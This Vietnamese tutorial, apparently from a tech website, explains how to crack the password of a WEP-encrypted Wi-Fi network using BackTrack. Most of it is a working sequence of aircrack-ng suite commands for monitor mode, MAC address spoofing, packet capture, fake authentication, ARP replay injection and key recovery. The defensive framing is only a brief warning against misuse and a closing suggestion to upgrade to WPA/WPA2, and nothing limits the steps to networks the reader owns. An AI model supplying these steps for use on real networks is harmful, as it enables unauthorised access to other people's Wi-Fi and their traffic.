Buzz
WEP - Wired Equivalent Privacy - là thuật toán bảo vệ wifi trên các router không dây, từng được sử dụng phổ biến. Tuy nhiên, lỗ hổng bảo mật của WEP đã được tiết lộ, ảnh hưởng đến an toàn thông tin của người dùng và doanh nghiệp. Các tiêu chuẩn mã hóa tiên tiến như WPA hay WPA2 đã thay thế WEP. Tuy nhiên, với các thiết bị cũ hay các mạng lỗi thời, WEP vẫn còn được sử dụng.
Hướng dẫn chi tiết cách dò mật khẩu wifi sử dụng mã hóa WEP bằng Backtrack từ Mytour. Lưu ý không sử dụng cách này với mục đích xấu.
Yêu cầu hệ thống và cơ sở hạ tầng :
Thiết bị chuyển đổi không dây phù hợp : Điều quan trọng nhất cho hạ tầng, bạn cần có một bộ chuyển đổi không dây (wireless adapter) có khả năng truyền gói tin mà máy tính của bạn không thể thực hiện. Bạn có thể tìm hiểu về các model như Alfa AWUS050NH…
Đĩa Backtrack LiveCD : Sử dụng để thực hiện các kiểm tra bảo mật. Bạn có thể tải bản ISO và ghi lại trên CD.
Mạng wifi sử dụng chuẩn WEP : Lưu ý rằng tín hiệu cần phải ổn định và có nhiều người sử dụng để tăng khả năng thành công khi dò mật khẩu.
Bước tiến trong việc Dò Mật khẩu Wifi với Backtrack
Bước 1: Mở cửa sổ dòng lệnh Konsole trong hệ điều hành Backtrack
Bước 2: Gõ lệnh sau đây
airmon-ng
để xem danh sách các mạng wifi xung quanh
Ghi lại thông tin từ cột Interface , ở đây là ra0
Thực hiện các dòng lệnh sau đây
airmon-ng stop (interface)
Tắt giao diện mạng bằng lệnh ifconfig (interface) down
Thay đổi địa chỉ MAC với lệnh macchanger --mac 00:11:22:33:44:55 (interface)
Bật chế độ monitor bằng lệnh airmon-ng start (interface)
(interface) là tên của giao diện mạng bạn đã lưu lại, ở đây là ra0
Trên đây là các bước để thay đổi địa chỉ MAC cho giao diện mạng. Nếu kết quả không như mong đợi, có thể wireless adapter của bạn không tương thích.
Bước 3 : Tiếp theo, thực hiện lệnh
airodump-ng (interface)
(interface) là tên của giao diện mạng bạn đã lưu lại, trong trường hợp này là ra0
Sử dụng câu lệnh này để hiển thị danh sách các mạng wifi xung quanh. Khi bạn tìm thấy wifi muốn dò mật khẩu, nhấn tổ hợp phím Ctrl + C để dừng danh sách.
Lưu lại thông số quan trọng như BSSID và CH . Chú ý rằng trong cột ENC hoặc CCMP phải là WEP để bạn có thể dò mật khẩu
Bước 4: Gõ câu lệnh sau đây
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
(channel) biểu diễn cho thông số CH bạn đã ghi lại ở bước 3
(bssid) đại diện cho thông số BSSID bạn đã ghi lại ở bước 3
(interface) là tên giao diện mạng mà bạn đã lưu, của tôi là ra0
(filename) là tên tệp mô tả, bạn có thể đặt theo ý muốn. Ở đây tôi đặt là yoyo
Bước 5: Giữ nguyên cửa sổ hiện tại và mở một cửa sổ Konsole mới. Nhập lệnh sau đây:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
(bssid) là thông số BSSID bạn đã ghi lại ở bước 3
(essid) là tên file mô tả (filename) bạn đã đặt ở bước 4
(interface) là tên giao diện mạng mà bạn đã lưu lại, trong trường hợp này là ra0
Tin nhắn báo thành công sẽ xuất hiện: Association successful!
Bước 6 : Tiếp tục nhập lệnh sau:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
(bssid) là địa chỉ BSSID mà bạn đã lưu ở bước 3
(interface) là tên giao diện mạng mà bạn đã lưu lại, trong trường hợp này là ra0
00:11:22:33:44:55 là địa chỉ MAC giả mạo ở bước trước
Backtrack sẽ thu thập các gói tin từ dữ liệu ra vào trên mạng Wifi đó. Dữ liệu sẽ được tự động lưu để sử dụng cho bước tiếp theo.
Lưu ý: Theo dõi số liệu cột Data trong cửa sổ Konsole. Đảm bảo rằng số liệu trong cột #Data vượt qua con số 10.000 để Backtrack có đủ dữ liệu để dò mật khẩu
Bước 7: Mở cửa sổ Konsole mới và nhập lệnh
aircrack-ng -b (bssid) (tên file-01.cap)
(bssid) là thông số BSSID bạn đã lưu ở bước 3
Tên file có thể đặt theo ý muốn, ví dụ: bắt đầu bằng tên và có phần mở rộng là .cap
Sau bước này, nếu mật khẩu được dò ra, sẽ xuất hiện ngay trên giao diện câu lệnh sau khi hiển thị từ khóa KEY FOUND. Trong trường hợp không đủ dữ liệu để dò mật khẩu, hãy thử lại vào thời điểm khác.
Lưu ý: Các bước thực hiện trong điều kiện lý tưởng với tỉ lệ thành công cao. Trong quá trình thao tác, có thể các bước sẽ không giống như trên hoặc có thông báo lỗi. Hãy kiểm tra lại hạ tầng mạng và thực hiện lại vào thời điểm khác. Sự kiên nhẫn là quan trọng khi dò mật khẩu từ các gói tin ra vào, không phải là nhiệm vụ đơn giản.
Đây là một số bước để dò mật khẩu wifi sử dụng chuẩn mã hóa WEP. Như đã thấy, vấn đề bảo mật wifi bằng chuẩn WEP đã lỗi thời và có thể bẻ khóa bằng một vài thao tác dòng lệnh đơn giản. Hãy kiểm tra lại hệ thống wifi và nâng cấp lên các chuẩn mới để đảm bảo an toàn.
